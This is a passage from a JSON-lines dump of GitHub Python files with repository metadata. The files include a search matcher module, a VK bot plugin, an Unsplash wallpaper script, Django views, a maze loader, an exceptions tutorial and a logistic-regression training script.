\"01\",\n \"gen\": \"01\",\n \"feb\": \"02\",\n \"fev\": \"02\",\n \"mar\": \"03\",\n \"maa\": \"03\",\n \"apr\": \"04\",\n \"avr\": \"04\",\n \"abr\": \"04\",\n \"may\": \"05\",\n \"mai\": \"05\",\n \"mag\": \"05\",\n \"mei\": \"05\",\n \"jun\": \"06\",\n \"giu\": \"06\",\n \"jul\": \"07\",\n \"lug\": \"07\",\n \"aug\": \"08\",\n \"aou\": \"08\",\n \"ago\": \"08\",\n \"sep\": \"09\",\n \"set\": \"09\",\n \"oct\": \"10\",\n \"okt\": \"10\",\n \"out\": \"10\",\n \"ott\": \"10\",\n \"nov\": \"11\",\n \"dec\": \"12\",\n \"des\": \"12\",\n \"dez\": \"12\",\n \"dic\": \"12\"}\n\n# Map from a 4 character month name prefix to its number. Used by the isodate/2 method below.\n_monthmap_4c = {u\"f\\u00e9v\": \"02\",\n u\"m\\u00e4r\": \"03\",\n u\"juin\": \"06\",\n u\"juil\": \"07\",\n u\"ao\\u00fb\": \"08\",\n u\"d\\u00e9c\": \"12\"}\n\n# Precompile some regular expressions used for matching and substitution. Used by the\n# nlq_quoted/2 and nlq_stopwords/2 methods below.\n_nlq1regexp = re.compile(r\"^\\s*[\\\"\\'].*[\\\"\\']\\s*$\")\n_nlq2regexp = re.compile(r\"\\\"\")\n_nlq3regexp = re.compile(r\"^nlquery\")\n_nlq4regexp = re.compile(r\"[,\\?\\.:\\(\\)\\s]+\")\n\n# Define a list of words that are presumably of no interest to include. Used by the\n# nlq_stopwords/2 method below.\n_nlqstopwords = {\"about\": 1, \"all\": 1, \"also\": 1, \"am\": 1, \"and\": 1, \"any\": 1, \"an\": 1, \"are\":1, \"as\": 1, \"at\": 1,\n \"been\": 1, \"be\": 1, \"but\": 1, \"by\": 1,\n \"cannot\": 1, \"can\": 1, \"couldn\": 1, \"could\": 1,\n \"didn\": 1, \"did\":1, \"doesn\": 1, \"does\": 1, \"done\": 1, \"do\": 1,\n \"for\": 1,\n \"had\": 1, \"hasn\": 1, \"has\": 1, \"haven\": 1, \"have\": 1, \"having\": 1, \"here\": 1, \"how\": 1,\n \"if\": 1, \"into\": 1, \"in\": 1, \"isn\": 1, \"is\": 1,\n \"let\": 1, \"ll\": 1,\n \"might\": 1,\n \"off\": 1, \"of\": 1, \"onto\": 1, \"on\": 1, \"or\": 1, \"out\": 1, \"over\": 1,\n \"shall\": 1, \"shouldn\": 1, \"should\": 1, \"some\": 1, \"so\": 1,\n \"them\": 1, \"then\": 1, \"there\": 1, \"these\": 1, \"they\": 1, \"the\": 1, \"this\": 1, \"those\": 1, \"too\": 1, \"to\": 1,\n \"until\": 1, \"unto\": 1, \"upon\": 1, \"up\": 1, \"us\": 1, \"u\": 1,\n \"very\": 1,\n \"wasn\": 1, \"was\": 1, \"went\": 1, \"weren\": 1, \"were\": 1, \"we\": 1, \"what\": 1, \"when\": 1, \"where\": 1, \"whether\": 1, \"which\": 1,\n \"whom\": 1, \"whose\": 1, \"who\": 1, \"why\": 1, \"will\": 1, \"with\": 1, \"wouldn\": 1, \"would\": 1}\n\ndef isodate(query, context):\n \"\"\"\n Normalize a variant of \"April 21st, 1970\" into \"1970-04-21\".\n\n This Python snippet is a companion to the date extractor. Dates are extracted\n using regular expressions, and the matching patterns are normalized by means of\n this routine. As such, this routine may have to be somewhat synchronized with\n the date extractor's main configuration file.\n \"\"\"\n\n # Paranoia.\n query = query or \"\"\n context = context or \"\"\n\n # Decompose the meta data, passed as, e.g., \"month2/April/day2/21/year2/1970\".\n meta = context.lower().split('/')\n\n # Set defaults.\n year = \"XXXX\"\n month = \"XX\"\n day = \"XX\"\n\n # Process the meta data. Note prefix matching.\n for i in range(0, len(meta), 2):\n if meta[i].startswith(\"year\"):\n year = meta[i + 1]\n if len(year) == 2:\n if year > \"10\":\n year = \"19%s\" % (year)\n else:\n year = \"20%s\" % (year)\n elif meta[i].startswith(\"month\"):\n try:\n month = str(int(meta[i + 1]))\n if len(month) == 1:\n month = \"0\" + month\n except:\n month = _monthmap_3c.get(meta[i + 1][0:3], month)\n if month == \"XX\":\n month = _monthmap_4c.get(unicode(meta[i + 1][0:4], \"utf-8\"), month)\n elif meta[i].startswith(\"day\"):\n day = meta[i + 1]\n if len(day) == 1:\n day = \"0\" + day\n\n # Swap day and month?\n if month != \"XX\" and day != \"XX\":\n if month >= \"13\" and day <= \"13\":\n month, day = day, month\n\n # Format the date according to the ISO 8601 standard.\n date = \"%s-%s-%s\" % (year, month, day)\n\n # Handle special cases, e.g., hardwire \"XXXX-09-11\" to \"2001-09-11\". Ideally, we'd deduce\n # this by looking at other evidence found in the same context as the incoming date.\n if date == \"XXXX-09-11\":\n year = \"2001\"\n date = \"2001-09-11\"\n\n # Return a nicely formatted ISO date as the base form, with the individual date items as meta data.\n return [(0, len(query), date, 255, 0, \"/\".join([\"year\", year, \"month\", month, \"day\", day]))]\n\ndef nlq_quoted(query, context):\n \"\"\"\n Helper method for partial processing of a certain class of natural language queries.\n Please contact Aleksandra Wasiak or Juergen Oesterle for details.\n \"\"\"\n\n query = query or \"\"\n context = context or \"\"\n\n # Rewrite the query to an FQL expression?\n if _nlq1regexp.search(query):\n return [(0, len(query), ''.join(['xml:document:string(\"', _nlq2regexp.sub('', query), '\", mode=\"phrase\")']), 255, 0, context)]\n else:\n return []\n\ndef nlq_stopwords(query, context):\n \"\"\"\n Helper method for partial processing of a certain class of natural language queries.\n Please contact Aleksandra Wasiak or Juergen Oesterle for details.\n \"\"\"\n\n query = query or \"\"\n context = context or \"\"\n\n # Already an FQL expression?\n if not _nlq3regexp.search(query):\n return []\n\n # Simple tokenization.\n terms = _nlq4regexp.split(query)\n \n if not terms:\n return []\n\n # Strip away stopwords.\n return [(0, len(query), \" \".join(filter(lambda x: x not in _nlqstopwords, terms)), 255, 0, context)]\n\ndef _enclosingtags(xml, all):\n \"\"\"\n Internal helper function, invoked by the scopenavigator/2 method below.\n \n Given an XML snippet, locates the highlighted terms and returns a list of scopes\n that includes/encloses these. We can choose to find all enclosing scopes, or just the\n nearest one.\n\n The algorithm first locates the end of a highlighted term. From that offset, we then\n start locating opening or closing tags. Tags that break a certain push/pop pattern must\n necessarily include/enclose the highlighted terms.\n \"\"\"\n\n tags = []\n\n # Iterate over all highlighted terms.\n for match1 in _junregexp1.finditer(xml):\n\n # What offsets does the match span?\n (i, j) = match1.span()\n \n stack = []\n\n # Find all tags that come after the highlighted term.\n for match2 in _junregexp2.finditer(xml[j:]):\n\n tag = match2.groups()[0]\n \n # Is it a closing tag?\n if tag[0] == '/':\n\n # Are we closing something we just opened?\n if stack and (tag[1:] == stack[-1]):\n stack.pop()\n\n # Unexpected pattern encountered. We've found an enclosing tag!\n else:\n tags.append(tag[1:])\n if not all:\n break\n\n # It's an opening tag. Booooring!\n else:\n stack.append(tag)\n \n return tags\n\ndef _getregexp(context):\n \"\"\"\n Internal helper function, invoked by the scopenavigator/2 method below.\n\n Returns a regular expression object that can be used for pulling out interesting\n stuff from XML snippets.\n\n The returned regular expression gets cached, so that we avoid recompiling it the next\n time someone asks for it. \n \"\"\"\n\n # Get the precompiled regular expression, if it exists.\n recognizer = _regexpmap.get(context, None)\n\n # No precompiled regular expression object available?\n if not recognizer:\n \n # Create a compiled regular expression object. Handle \"foo\" and \"foo@bar\"\n # specifications.\n try:\n if not \"@\" in context:\n recognizer = re.compile(\"\".join([r\"<\\s*\", context, r\"\\b[^>]*>(.*?)<\\s*/\\s*\", context, r\"\\s*>\"]))\n else:\n (tag, attribute) = context.split(\"@\", 1)\n recognizer = re.compile(\"\".join([r\"<\\s*\", tag, r\"\\s+[^>]*\", attribute, r\"\\s*=\\s*\\\"(.*?)\\\"\"]))\n except:\n return None\n\n # Cache it, to avoid having to recompile it later. We implicitly assume that the set of possible\n # specifications isn't overly large so that memory consumption doesn't grow indefinitely.\n _regexpmap[context] = recognizer\n\n # Done!\n return recognizer\n\ndef scopenavigator(query, context):\n \"\"\"\n This Python snippet is a companion to shallow navigators of type 'dynamic', applied\n to XML fragments returned as matching scopes.\n \"\"\"\n\n matches = []\n\n # Paranoia.\n if not query or not context:\n return matches\n\n # Interpret a \"!\" suffix as a uniqueness specification.\n unique = context.endswith(\"!\")\n\n if unique:\n context = context[:-1]\n added = {}\n \n # Interpret a \"?\" suffix as a highlighting-constraint specification.\n constrained = context.endswith(\"?\")\n\n if constrained:\n context = context[:-1]\n\n # This is only relevant together with a \"*\" specification, see below.\n constrainedall = (constrained and context.endswith(\"?\"))\n\n if constrainedall:\n context = context[:-1]\n\n # Interpret \"star\" type specifications as a means for aggregating over structure instead of content.\n if (context[0] == \"*\"):\n star0 = True\n star1 = (context == \"*\")\n star2 = (context == \"*@*\")\n else:\n star0 = False\n star1 = False\n star2 = False\n\n # Apply the regular expression magic to the XML fragment. Avoid picking up XML envelope tags and other\n # ignorable stuff, if relevant. Note that position information is not needed by the client.\n # Handle \"foo\" and \"foo@bar\" context specifications, possibly constrained. Unescape some commonly escaped\n # entities (see ticket 11854 for details).\n if not star0:\n regexp = _getregexp(context)\n if regexp:\n for match in regexp.finditer(query):\n target = match.groups()[0]\n highlighted = (_junbohseq in target) or (_juneohseq in target)\n if constrained and not highlighted:\n continue\n if (\"<\" in target) or highlighted:\n target = _stripregexp.sub(\"\", target)\n if \"&\" in target:\n target = target.replace('&', '&')\n target = target.replace('"', '\"')\n if unique and target in added:\n continue\n matches.append((0, 0, target, 255, 0, context))\n if unique:\n added[target] = 1\n\n # Handle \"*@*\" context specifications.\n elif star2 and not constrained:\n for match1 in _tagregexp1.finditer(query):\n target1 = match1.groups()[0]\n if target1 in _ignoretags:\n continue\n for match2 in _tagregexp2.finditer(match1.groups()[1]):\n target2 = match2.groups()[0]\n target3 = \"@\".join([target1, target2])\n if unique and target3 in added:\n continue\n matches.append((0, 0, target3, 255, 0, context))\n if unique:\n added[target3] = 1\n\n # Handle \"*\" context specifications.\n elif star1 and not constrained:\n for match in _tagregexp3.finditer(query):\n target = match.groups()[0]\n if target in _ignoretags:\n continue\n if unique and target in added:\n continue\n matches.append((0, 0, target, 255, 0, context))\n if unique:\n added[target] = 1\n\n # Handle \"*?\" context specifications.\n elif star1 and constrained:\n for target in _enclosingtags(query, constrainedall):\n if target in _ignoretags:\n continue\n if unique and target in added:\n continue\n matches.append((0, 0, target, 255, 0, context))\n if unique:\n added[target] = 1\n\n # All other context specifications.\n else:\n pass\n\n # Let the client convert the list of all matches into content for a navigator.\n return matches\n","repo_name":"rokhmatpn/nlp","sub_path":"fast_libs/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":15095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5120566329","text":"import asyncio\nfrom vkbottle import Message\nfrom nicevk.api import user, commands\n\ncommands.append(\".type - just typing the text\")\n\n\n@user.on.message_handler(text=\".type \")\nasync def help_(ans: Message, text: str):\n if not text:\n return await ans.api.messages.edit(\n ans.peer_id, ans.id, \"I need something to type\"\n )\n if \" \" in text: # to prevent messageWasntModified error\n text = text.replace(\" \", \"ᅠ\") # invisible char\n else:\n pass\n\n mes = \"\"\n for char in text:\n mes += \"|\"\n await ans.api.messages.edit(ans.peer_id, ans.id, mes)\n await asyncio.sleep(0.04)\n mes = mes[:-1] + char\n await ans.api.messages.edit(ans.peer_id, ans.id, mes)\n await asyncio.sleep(0.02)\n","repo_name":"nm17/nicevk","sub_path":"nicevk/plugins/type_plugin.py","file_name":"type_plugin.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"23277326578","text":"from strategy.BaseStrategy import Strategy\nfrom strategy.DebugTools import DebugPotentialFieldStrategy\nfrom controller.uni_controller import UniController\nimport math\nimport algorithms\n\n# class MainAttacker(DebugPotentialFieldStrategy):\nclass MainAttacker(Strategy):\n def __init__(self, match, name=\"MainAttacker\"):\n super().__init__(match, name, controller=UniController)\n\n def start(self, robot=None):\n super().start(robot=robot)\n\n self.point = algorithms.fields.PotentialField(\n self.match,\n name=\"{}|PointBehaviour\".format(self.__class__)\n )\n\n self.point.add_field(\n algorithms.fields.PointField(\n self.match,\n target = (0.75, 0.65),\n radius = .075,\n decay = lambda x: x,\n multiplier = 1\n )\n )\n\n def reset(self, robot=None):\n super().reset()\n if robot:\n self.start(robot)\n\n def decide(self, x=None, y=None):\n if x:\n self.robot.x = x\n if y:\n self.robot.y = y\n\n behaviour = None\n\n behaviour = self.point\n\n return behaviour.compute([self.robot.x, self.robot.y])\n \n \n","repo_name":"UFRBots/UFRBOTS_PROJECT_NEON","sub_path":"strategy/cbfr2022/mainAttacker.py","file_name":"mainAttacker.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32344832465","text":"import requests\nfrom PIL import Image\nfrom io import BytesIO\nimport os\n\n\nACCESS_KEY=''\nsearchTerm = ''\npath = ''\n\nimage_endpoint = f\"https://api.unsplash.com/photos/random?query={searchTerm}&page=1&per_page=10&orientation=landscape&client_id={ACCESS_KEY}\"\nresponse = requests.get(image_endpoint)\nphoto = response.json()\n\ndownload_location = photo['links']['download_location']\npayload = {'client_id':ACCESS_KEY}\nresponse = requests.get(download_location, payload)\nstatus_code = response.status_code\n\nif status_code == 200:\n image_id = photo['id']\n image_download_url = response.json()['url']\n response = requests.get(image_download_url)\n format = Image.open(BytesIO(response.content)).format # Gets the file type of the image\n filename = f\"{path}/photo.{format}\"\n Image.open(BytesIO(response.content)).save(filename)\n os.system(\"gsettings set org.gnome.desktop.background picture-uri file://\"+filename)\nelse:\n print('download failed', status_code)\n","repo_name":"Mattrcarey/Background_Changer","sub_path":"BackgroundChanger.py","file_name":"BackgroundChanger.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24982382984","text":"from __future__ import unicode_literals\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom .models import User\nfrom django.contrib import messages\nfrom django.contrib.messages import error\n\n# Create your views here.\ndef index(request):\n context = {\n 'users': User.objects.all()\n }\n return render(request,'users/index.html', context)\n\ndef new(request):\n\treturn render(request,'users/new.html')\n\ndef create(request):\n errors = User.objects.basic_validator(request.POST)\n if len(errors):\n for field, message in errors.iteritems():\n error(request, message, extra_tags=field)\n return redirect('/users/new')\n else:\n User.objects.create(first_name=request.POST['first_name'], last_name=request.POST['last_name'], email=request.POST['email'])\n return redirect('/users')\n\ndef show(request, id):\n return render(request,'users/show.html', {\"users\":User.objects.get(id=id)})\n\ndef edit(request, id):\n context = {\n 'users': User.objects.get(id=id)\n }\n return render(request,'users/edit.html', context)\n\ndef update(request, id):\n errors = User.objects.basic_validator(request.POST)\n if len(errors):\n for field, message in errors.iteritems():\n error(request, message, extra_tags=field)\n return redirect('/users/new')\n else:\n updating_user = User.objects.get(id=id)\n updating_user.first_name = request.POST['first_name']\n updating_user.last_name = request.POST['last_name']\n updating_user.email = request.POST['email']\n updating_user.save()\n return redirect('/users')\n\ndef destroy(request, id):\n removing_user = User.objects.get(id=id)\n removing_user.delete()\n return redirect('/')","repo_name":"py2-10-2017/KevinDunn","sub_path":"week7/semi_restful/apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73705189211","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 14 21:17:13 2019\n\n@author: zhaolei\n\"\"\"\n\n'''\n查找\n'''\nclass SearchMethod():\n \n def __init__(self, a):\n self.list = a\n \n '''\n 二分查找\n a = [1,3,5,7,9,10]\n 时间复杂度O(lgn)\n 空间复杂度O(1)\n 二分查找:查找操作快,插入慢,由此引入BST(二叉查找树)\n '''\n def binarySearch(self, a, key, low, high):\n if not a:\n return \"error, a is Null\"\n mid = int((low + high)/2)\n print(a[mid])\n if low > high : return -1\n if a[mid] == key:\n return mid\n elif key < a[mid]:\n return self.binarySearch(a, key, low, mid-1)\n else :\n return self.binarySearch(a, key, mid + 1, high)\n \n \n \n \nif __name__ == '__main__':\n a = [1,3,5,7,9,10]\n p = SearchMethod(a)\n mid = p.binarySearch(p.list, 3, 0, len(p.list) - 1)\n print(mid)\n \n \n ","repo_name":"zhlei99/more_and_more_learning","sub_path":"data_structure/SearchMethod.py","file_name":"SearchMethod.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10699760827","text":"import os\nimport numpy as np\nimport random\n\nrandom.seed(2022)\n\nflag_list = [0, 1, 2, 3, 5, 6, 7, 8]\n# [0, 1, 2\n# 3, 5\n# 6, 7, 8]\n\ntime_list = [0, 1, 2]\n\n# the maze of size 201*201*2\nmaze_cells = np.zeros((201, 201, 2), dtype=int)\n\n# load maze\ndef load_maze():\n file_path = \"maze/COMP6247Maze20212022.npy\"\n if not os.path.exists(file_path):\n raise ValueError(\"Cannot find %s\" % file_path)\n\n else:\n global maze_cells\n maze = np.load(file_path, allow_pickle=False, fix_imports=True)\n maze_cells = np.zeros((maze.shape[0], maze.shape[1], 2), dtype=int)\n for i in range(maze.shape[0]):\n for j in range(maze.shape[1]):\n maze_cells[i][j][0] = maze[i][j]\n # load the maze, with 1 denoting an empty location and 0 denoting a wall\n maze_cells[i][j][1] = 0\n # initialized to 0 denoting no fire\n return maze\n\n# get local 3*3 information centered at (x,y).\ndef get_local_maze_information(x, y):\n global maze_cells\n random_location = random.choice(flag_list)\n around = np.zeros((3, 3, 2), dtype=int)\n for i in range(maze_cells.shape[0]):\n for j in range(maze_cells.shape[1]):\n if maze_cells[i][j][1] == 0:\n pass\n else:\n maze_cells[i][j][1] = maze_cells[i][j][1] - 1 # decrement the fire time\n\n for i in range(3):\n for j in range(3):\n if x - 1 + i < 0 or x - 1 + i >= maze_cells.shape[0] or y - 1 + j < 0 or y - 1 + j >= maze_cells.shape[1]:\n around[i][j][0] = 0 # this cell is outside the maze, and we set it to a wall\n around[i][j][1] = 0\n continue\n around[i][j][0] = maze_cells[x - 1 + i][y - 1 + j][0]\n around[i][j][1] = maze_cells[x - 1 + i][y - 1 + j][1]\n if i == random_location // 3 and j == random_location % 3:\n if around[i][j][0] == 0: # this cell is a wall\n continue\n ran_time = random.choice(time_list)\n around[i][j][1] = ran_time + around[i][j][1]\n maze_cells[x - 1 + i][y - 1 + j][1] = around[i][j][1]\n return around\n","repo_name":"Resh-97/Dynamic_Maze_Solving","sub_path":"maze/read_maze.py","file_name":"read_maze.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"27300606339","text":"\ndef one():\n for i in range(1 , 100):\n print(str(i))\n\n\ndef fa(b):\n if b == 1 :\n return 1\n else:\n return b*fa(b-1)\n\n\n\n\n\n\n\n\ndef zoj(n):\n if n%2 == 0 :\n print( \"z\")\n\n\n\n\n\n else:\n print(\"f\")\n\nif __name__ == '__main__':\n print(fa (5))\n\n\n\n\n\n\n","repo_name":"zehramian/zfolder","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22650871397","text":"# Errors and Exceptions \n\n'''Errors and exceptions will be commented out in order to not raise exceptions during run time.\nRemove the comments to try the code at runtime.'''\n\n'''You can raise an exception in Python when a certain condition is met.\nx = -5 \nif x < 0:\n raise Exception('x should be a positive number')'''\n\n'''You can also use an assert statement to throw an error is your assertion is not true.\nx = -5\nassert(x >= 0), 'x is not a positive number'\n'''\n\n'''You can also do a try/except block. This will try a block of code and raise an exception if the \ncode fails at run time.'''\ntry:\n a = 5 / 0\nexcept:\n print('An error occurred. You cannot divide by zero.')\n\n# You can do the same thing using the built-in error handling.\ntry:\n a = 5 / 0\nexcept Exception as e:\n print(e)\n\n# If you know what the error type is you can just put it directly into the code.\ntry:\n a = 5 / 0\nexcept ZeroDivisionError:\n print('You cannot divide by zero.')\n\ntry:\n a = 6\n b = a + '10'\nexcept TypeError as f:\n print(f)\n\n# You may also add an else clause to your try/except block in case no error occurred.\ntry:\n a = 6\n b = a + 10\nexcept TypeError as f:\n print(f)\nelse:\n print('Looking good!')\n\n# You may also add a finally clause, which runs whether there was an exception or not.\ntry:\n a = 6\n b = a + 10\nexcept TypeError as f:\n print(f)\nelse:\n print('Looking good!')\nfinally:\n print('Cleaning up...')\n\ntry:\n a = 6\n b = a + '10'\nexcept TypeError as f:\n print(f)\nelse:\n print('Looking good!')\nfinally:\n print('Cleaning up...')\n\n# You may also define your own exception by defining an Error class via subclassing from the base Exception class.\nclass ValueTooHighError(Exception):\n pass\n\ndef test_value(x):\n if x > 100:\n raise ValueTooHighError('The value is too high.')\n# Remove the hash below to test this function.\n# test_value(200)\n\n# You may also add this function to a try/except block.\ntry:\n test_value(200)\nexcept ValueTooHighError as y:\n print(y)\n\n'''You'll want to keep your Error classes small but useful. Let's try one more, but we'll make it opreate a bit differently this time. \nAgain, the base class will be the Exception class.'''\nclass ValueTooSmallError(Exception):\n def __init__(self, message, value):\n self.message = message\n self.value = value\n\ndef test_value_2(x):\n if x < 5:\n raise ValueTooSmallError('The value is too small:', x)\n\ntry:\n test_value_2(1)\nexcept ValueTooSmallError as y:\n print(y.message, y.value)\n# As you can see, tje message was printed along with the value.\n","repo_name":"mrichinfinite/scratchy","sub_path":"scratch/scratch2/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"11181020571","text":"import matplotlib.pyplot as plt\nfrom skimage.segmentation import slic\nfrom skimage.segmentation import mark_boundaries\n#from skimage.segmentation import get_mean_colors\nfrom skimage.util import img_as_float\nfrom skimage import io\nimport numpy as np\n\n#pylab inline\n#matplotlib inline \n\ndef get_mean(img, indic):\n\tindica = img*indic\n\tn = indic.sum()\n\treturn int(indica.sum()*1.0/n)\n\nimg = img_as_float(io.imread('f1.JPEG'))\nio.imshow(img);\nimga = np.zeros(img.shape, dtype = 'uint8')\n\ncount =0\n\n\n\nsegments = slic(img, n_segments = 10, compactness = 10, sigma = 1)\nfor v in np.unique(segments):\n\tprint(count)\n\tcount += 1\n\t# construct a mask for the segment\n\t# print \"[x] inspecting segment %d\" % (i)\n\tindic = np.zeros(img.shape, dtype = \"uint8\")\n\tindic[segments == v] = 1\n\timga[segments == v] = get_mean(img, indic)\n\nio.imshow(imga);\nfig = plt.figure(figsize=(12,4))\nax = fig.add_axes([0, 0, 1, 1])\nax.imshow(mark_boundaries(img, segments)) \nplt.show()\n\n#50, 100, 300, 500, 1000","repo_name":"plasmatiger/Adversary_ML","sub_path":"slicavg.py","file_name":"slicavg.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24744452668","text":"import os, sys\nimport numpy as np\nfrom random import shuffle\nfrom math import log, floor\nimport pandas as pd\n\n\n# 此函数用于加载训练和测试数据\ndef load_data(train_data_path, train_label_path, test_data_path):\n X_train = pd.read_csv(train_data_path, sep=',', header=0)\n X_train = np.array(X_train.values)\n Y_train = pd.read_csv(train_label_path, sep=',', header=0)\n Y_train = np.array(Y_train.values)\n X_test = pd.read_csv(test_data_path, sep=',', header=0)\n X_test = np.array(X_test.values)\n return (X_train, Y_train, X_test)\n\n\n# 此函数用于打乱训练数据的排序\ndef _shuffle(X, Y):\n randomize = np.arange(len(X))\n np.random.shuffle(randomize)\n return (X[randomize], Y[randomize])\n\n\n# 此函数用于将训练和测试数据特征归一化\ndef normalize(X_all, X_test):\n # 将训练集与测试集合并后归一化\n X_train_test = np.concatenate((X_all, X_test))\n mu = (sum(X_train_test) / X_train_test.shape[0])\n sigma = np.std(X_train_test, axis=0)\n mu = np.tile(mu, (X_train_test.shape[0], 1))\n sigma = np.tile(sigma, (X_train_test.shape[0], 1))\n X_train_test_normed = (X_train_test - mu) / sigma\n\n # 归一化后将数据从新分为训练集和测试集\n X_all = X_train_test_normed[0:X_all.shape[0]]\n X_test = X_train_test_normed[X_all.shape[0]:]\n return X_all, X_test\n\n\n# 此函数用于将训练集划分为要使用的训练集和用于选择模型的训练集\ndef split_valid_set(X_all, Y_all, percentage):\n all_data_size = len(X_all)\n valid_data_size = int(floor(all_data_size * percentage))\n X_all, Y_all = _shuffle(X_all, Y_all)\n X_train, Y_train = X_all[0:valid_data_size], Y_all[0:valid_data_size]\n X_valid, Y_valid = X_all[valid_data_size:], Y_all[valid_data_size:]\n return X_train, Y_train, X_valid, Y_valid\n\n\n# 定义sigmoid函数\ndef sigmoid(z):\n res = 1 / (1.0 + np.exp(-z))\n return np.clip(res, 1e-8, 1 - (1e-8))\n\n\n# 验证模型的正确性\ndef valid(w, b, X_valid, Y_valid):\n valid_data_size = len(X_valid)\n\n z = (np.dot(X_valid, np.transpose(w)) + b)\n y = sigmoid(z)\n y_ = np.around(y)\n result = (np.squeeze(Y_valid) == y_)\n return y_\n\n\ndef train(X_all, Y_all, save_dir):\n # 划分0.1的训练集用于挑选模型\n valid_set_percentage = 0.1\n X_train, Y_train, X_valid, Y_valid = split_valid_set(X_all, Y_all, valid_set_percentage)\n # 创建原始参数,设定学习速率、训练次数、每次训练用多少数据\n w = np.zeros((16,))\n b = np.zeros((1,))\n l_rate = 0.1\n batch_size = 32\n train_data_size = len(X_train)\n step_num = int(floor(train_data_size / batch_size))\n epoch_num = 10000\n save_param_iter = 2000\n total_loss = 0.0\n # 开始训练\n for epoch in range(1, epoch_num):\n # 将训练集随机打乱\n X_train, Y_train = _shuffle(X_train, Y_train)\n # 每batch_size个数据为一组训练\n for idx in range(step_num):\n X = X_train[idx * batch_size:(idx + 1) * batch_size]\n Y = Y_train[idx * batch_size:(idx + 1) * batch_size]\n z = np.dot(X, np.transpose(w)) + b\n y = sigmoid(z)\n cross_entropy = -1 * (np.dot(np.squeeze(Y), np.log(y)) + np.dot((1 - np.squeeze(Y)), np.log(1 - y)))\n total_loss += cross_entropy\n w_grad = np.sum(-1 * X * (np.squeeze(Y) - y).reshape((batch_size, 1)), axis=0)\n b_grad = np.sum(-1 * (np.squeeze(Y) - y))\n # 梯度下降迭代参数\n w = w - l_rate * w_grad\n b = b - l_rate * b_grad\n print(w)\n print(b)\n print('+ = ' * 20)\n # 模型验证与保存参数\n if epoch % save_param_iter == 0:\n print('=====Saving Param at epoch %d=====' % epoch)\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n np.savetxt(os.path.join(save_dir, 'w'), w)\n np.savetxt(os.path.join(save_dir, 'b'), [b, ])\n\n print('epoch avg loss = %f' % (total_loss / (float(save_param_iter) * train_data_size)))\n total_loss = 0.0\n valid(w, b, X_valid, Y_valid)\n\n\n# 输入测试数据并输出测试结果\ndef infer(X_test, save_dir, output_dir):\n test_data_size = len(X_test)\n\n # 加载所得结果参数w和b\n print('=====Loading Param from %s=====' % save_dir)\n w = np.loadtxt(os.path.join(save_dir, 'w'))\n b = np.loadtxt(os.path.join(save_dir, 'b'))\n\n # 将w和b与测试集代入函数求得预测值\n z = (np.dot(X_test, np.transpose(w)) + b)\n y = sigmoid(z)\n y_ = np.around(y)\n\n print('=====Write output to %s =====' % output_dir)\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n output_path = os.path.join(output_dir, 'log_prediction.csv')\n with open(output_path, 'w') as f:\n f.write('id,label\\n')\n for i, v in enumerate(y_):\n f.write('%d,%d\\n' % (i + 1, v))\n return\n\n\ndef AUC(label, pre):\n # 计算正样本和负样本的索引,以便索引出之后的概率值\n pos = [i for i in range(len(label)) if label[i] == 1]\n neg = [i for i in range(len(label)) if label[i] == 0]\n auc = 0\n for i in pos:\n for j in neg:\n if pre[i] > pre[j]:\n auc += 1\n elif pre[i] == pre[j]:\n auc += 0.5\n return auc / (len(pos) * len(neg))\n\n\nif __name__ == \"__main__\":\n method = 'preprocess'\n if method == 'preprocess':\n data = pd.read_csv(\"train.csv\")\n print(data.shape)\n data = data.fillna(-1)\n data.drop(labels=['Date', 'Location', 'WindDir9am', 'WindSpeed3pm', 'WindGustDir',], axis=1, inplace=True)\n data.drop(labels=['WindDir3pm'], axis=1, inplace=True)\n print(data.shape)\n data.RainTomorrow = data.RainTomorrow.map({'No': 0, 'Yes': 1})\n data.RainToday = data.RainToday.map({'No': 0, 'Yes': 1, 'nan': -1})\n\n dataTest = pd.read_csv(\"test.csv\")\n print(dataTest.shape)\n dataTest = dataTest.fillna(-1)\n dataTest.drop(labels=['Date', 'Location', 'WindDir9am', 'WindSpeed3pm', 'WindGustDir',], axis=1, inplace=True)\n dataTest.drop(labels=['WindDir3pm'], axis=1, inplace=True)\n print(dataTest.shape)\n dataTest.RainToday = dataTest.RainToday.map({'No': 0, 'Yes': 1, 'nan': -1})\n Y_all = np.array(data['RainTomorrow'].values)\n del data['RainTomorrow']\n X_all = np.array(data.values)\n X_test = np.array(dataTest.values)\n print(X_all.shape, Y_all.shape, X_test.shape)\n\n train(X_all, Y_all, './results')\n infer(X_test, './results', './results')","repo_name":"Alvin2580du/alvin_py","sub_path":"business/p201908/700/tmp2.py","file_name":"tmp2.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"43341374840","text":"import 